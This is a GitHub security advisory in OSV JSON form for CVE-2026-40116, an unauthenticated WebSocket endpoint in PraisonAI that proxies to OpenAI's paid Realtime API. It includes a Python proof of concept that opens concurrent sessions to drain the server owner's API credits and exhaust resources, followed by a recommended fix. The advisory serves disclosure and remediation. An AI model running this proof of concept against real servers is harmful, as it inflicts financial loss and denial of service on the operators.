{ "schema_version": "1.4.0", "id": "GHSA-q5r4-47m9-5mc7", "modified": "2026-04-10T19:22:52Z", "published": "2026-04-10T19:22:52Z", "aliases": [ "CVE-2026-40116" ], "summary": "PraisonAI: Unauthenticated WebSocket Endpoint Proxies to Paid OpenAI Realtime API Without Rate Limits", "details": "## Summary\n\nThe `/media-stream` WebSocket endpoint in PraisonAI's call module accepts connections from any client without authentication or Twilio signature validation. Each connection opens an authenticated session to OpenAI's Realtime API using the server's API key. There are no limits on concurrent connections, message rate, or message size, allowing an unauthenticated attacker to exhaust server resources and drain the victim's OpenAI API credits.\n\n## Details\n\nThe vulnerability exists in `src/praisonai/praisonai/api/call.py`. The FastAPI application defines a WebSocket endpoint at line 108 with no authentication middleware, no Twilio request signature validation, and no rate limiting:\n\n```python\n# line 108-112 — no auth, no middleware, accepts any WebSocket client\n@app.websocket(\"/media-stream\")\nasync def handle_media_stream(websocket: WebSocket):\n \"\"\"Handle WebSocket connections between Twilio and OpenAI.\"\"\"\n print(\"Client connected\")\n await websocket.accept()\n```\n\nImmediately upon connection, the handler opens an authenticated session to OpenAI's paid Realtime API using the server's `OPENAI_API_KEY`:\n\n```python\n# line 114-120 — each unauthenticated connection spawns a paid API session\n async with websockets.connect(\n 'wss://api.openai.com/v1/realtime?model=gpt-4o-realtime-preview-2024-10-01',\n extra_headers={\n \"Authorization\": f\"Bearer {OPENAI_API_KEY}\",\n \"OpenAI-Beta\": \"realtime=v1\"\n }\n ) as openai_ws:\n```\n\nThe `receive_from_twilio()` coroutine then reads unlimited messages and forwards them directly to OpenAI:\n\n```python\n# line 128-135 — unbounded message ingestion, no size/rate check\n async for message in websocket.iter_text():\n data = json.loads(message)\n if data['event'] == 'media' and openai_ws.open:\n audio_append = {\n \"type\": \"input_audio_buffer.append\",\n \"audio\": data['media']['payload']\n }\n await openai_ws.send(json.dumps(audio_append))\n```\n\nThe server binds to `0.0.0.0` (line 273) and can be exposed to the internet via ngrok (`--public` flag). Twilio's `RequestValidator` is never used — the endpoint was designed to receive Twilio media streams but performs no verification that the connecting client is actually Twilio. The standard mitigation for Twilio WebSocket endpoints is to validate the `X-Twilio-Signature` header, which is absent here.\n\nAdditionally, `uvicorn.run()` is called without a `ws_max_size` parameter (line 273), defaulting to 16MB per WebSocket message. Combined with no connection limit, this allows substantial memory consumption.\n\n## PoC\n\n```bash\n# Step 1: Verify the endpoint is accessible and accepts connections\npython3 -c \"\nimport asyncio\nimport websockets\nimport json\n\nasync def test():\n async with websockets.connect('ws://TARGET:8090/media-stream') as ws:\n # Send a start event (mimicking Twilio)\n await ws.send(json.dumps({\n 'event': 'start',\n 'start': {'streamSid': 'attacker-session-1'}\n }))\n # Send a media event — this gets forwarded to OpenAI Realtime API\n await ws.send(json.dumps({\n 'event': 'media',\n 'media': {'payload': 'SGVsbG8gV29ybGQ='}\n }))\n # Receive the OpenAI response routed back\n response = await asyncio.wait_for(ws.recv(), timeout=10)\n print('Received response (confirms OpenAI session active):', response[:200])\n\nasyncio.run(test())\n\"\n\n# Step 2: Demonstrate resource exhaustion — open multiple concurrent connections\n# Each connection spawns an OpenAI Realtime API session billed to the server owner\npython3 -c \"\nimport asyncio\nimport websockets\nimport json\nimport base64\n\nasync def open_session(i):\n uri = 'ws://TARGET:8090/media-stream'\n async with websockets.connect(uri) as ws:\n await ws.send(json.dumps({\n 'event': 'start',\n 'start': {'streamSid': f'attacker-{i}'}\n }))\n # Send audio data to keep the OpenAI session active and billing\n payload = base64.b64encode(b'\\\\x00' * 8000).decode() # ~8KB audio chunk\n for _ in range(100):\n await ws.send(json.dumps({\n 'event': 'media',\n 'media': {'payload': payload}\n }))\n await asyncio.sleep(0.01)\n print(f'Session {i}: sent 100 audio chunks to OpenAI via proxy')\n\nasync def main():\n # Open 10 concurrent sessions (each consuming OpenAI Realtime API credits)\n await asyncio.gather(*[open_session(i) for i in range(10)])\n\nasyncio.run(main())\n\"\n```\n\nReplace `TARGET` with the server's hostname/IP. Each connection in Step 2 opens a separate authenticated OpenAI Realtime API session. The server logs will show \"Client connected\" and \"Incoming stream has started\" for each attacker session.\n\n## Impact\n\n1. **OpenAI API credit drain**: Each unauthenticated WebSocket connection opens a billed OpenAI Realtime API session. An attacker can open many concurrent sessions and stream audio data, accumulating charges on the victim's OpenAI account. The Realtime API bills per-second of audio, making this financially impactful.\n\n2. **Denial of service**: Legitimate Twilio callers are denied service when the server's resources (memory, file descriptors, OpenAI API rate limits) are exhausted by attacker connections.\n\n3. **Server memory exhaustion**: With no per-message size limit (16MB default) and no connection limit, an attacker can consume server memory by opening many connections and sending large payloads.\n\n## Recommended Fix\n\nAdd Twilio signature validation, connection limits, and rate limiting:\n\n```python\nfrom twilio.request_validator import RequestValidator\nfrom starlette.websockets import WebSocketState\nimport time\n\n# Connection tracking\nMAX_CONCURRENT_CONNECTIONS = 20\nactive_connections = 0\nconnection_lock = asyncio.Lock()\n\nTWILIO_AUTH_TOKEN = os.getenv('TWILIO_AUTH_TOKEN')\n\n@app.websocket(\"/media-stream\")\nasync def handle_media_stream(websocket: WebSocket):\n global active_connections\n \n # Enforce connection limit\n async with connection_lock:\n if active_connections >= MAX_CONCURRENT_CONNECTIONS:\n await websocket.close(code=1008, reason=\"Too many connections\")\n return\n active_connections += 1\n \n try:\n # Validate Twilio signature if auth token is configured\n if TWILIO_AUTH_TOKEN:\n validator = RequestValidator(TWILIO_AUTH_TOKEN)\n url = str(websocket.url).replace(\"ws://\", \"http://\").replace(\"wss://\", \"https://\")\n signature = websocket.headers.get(\"X-Twilio-Signature\", \"\")\n if not validator.validate(url, {}, signature):\n await websocket.close(code=1008, reason=\"Invalid signature\")\n return\n \n await websocket.accept()\n # ... rest of handler ...\n finally:\n async with connection_lock:\n active_connections -= 1\n```\n\nAdditionally, pass `ws_max_size` to uvicorn to limit individual message sizes:\n\n```python\nuvicorn.run(app, host=\"0.0.0.0\", port=port, log_level=\"warning\", ws_max_size=1_048_576) # 1MB\n```", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "affected": [ { "package": { "ecosystem": "PyPI", "name": "PraisonAI" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.5.128" } ] } ] } ], "references": [ { "type": "WEB", "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-q5r4-47m9-5mc7" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40116" }, { "type": "PACKAGE", "url": "https://github.com/MervinPraison/PraisonAI" }, { "type": "WEB", "url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-04-10T19:22:52Z", "nvd_published_at": "2026-04-09T22:16:35Z" } }